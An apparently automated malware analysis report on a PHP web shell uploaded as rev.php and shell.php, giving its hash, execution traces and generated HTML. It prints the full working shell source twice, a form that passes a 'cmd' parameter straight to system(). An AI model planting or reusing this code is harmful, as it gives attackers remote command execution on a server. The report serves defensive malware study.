PHP Malware Analysis

rev.php, shell.php

md5: ad6a2727ff7f799b710aff38193fa53a

Attributes

Execution

Input


Deobfuscated PHP code

<html>
<body>
<form method="GET" name="<?php 
echo basename($_SERVER['PHP_SELF']);
?>">
<input type="TEXT" name="cmd" id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php 
if (isset($_GET['cmd'])) {
    system($_GET['cmd']);
}
?>
</pre>
</body>
<script>document.getElementById("cmd").focus();</script>
</html>

Execution traces

data/traces/ad6a2727ff7f799b710aff38193fa53a_trace-1676247581.9559.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 22:20:07.853764]
1	0	1	0.000173	393512
1	3	0	0.000239	395120	{main}	1		/var/www/html/uploads/rev.php	0	0
2	4	0	0.000261	395120	basename	0		/var/www/html/uploads/rev.php	3	1	'/uploads/rev.php'
2	4	1	0.000282	395184
2	4	R			'rev.php'
1	3	1	0.000303	395120
			0.000333	314224
TRACE END   [2023-02-12 22:20:07.853961]

data/traces/ad6a2727ff7f799b710aff38193fa53a_trace-1676259812.4462.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 01:43:58.344099]
1	0	1	0.000227	393512
1	3	0	0.000293	395120	{main}	1		/var/www/html/uploads/shell.php	0	0
2	4	0	0.000313	395120	basename	0		/var/www/html/uploads/shell.php	3	1	'/uploads/shell.php'
2	4	1	0.000333	395192
2	4	R			'shell.php'
1	3	1	0.000349	395120
			0.000379	314224
TRACE END   [2023-02-13 01:43:58.344294]


Generated HTML code

<html><head></head><body>
<form method="GET" name="rev.php">
<input type="TEXT" name="cmd" id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre></pre>

<script>document.getElementById("cmd").focus();</script>

</body></html>

Original PHP code

<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
    if(isset($_GET['cmd']))
    {
        system($_GET['cmd']);
    }
?>
</pre>
</body>
<script>document.getElementById("cmd").focus();</script>
</html>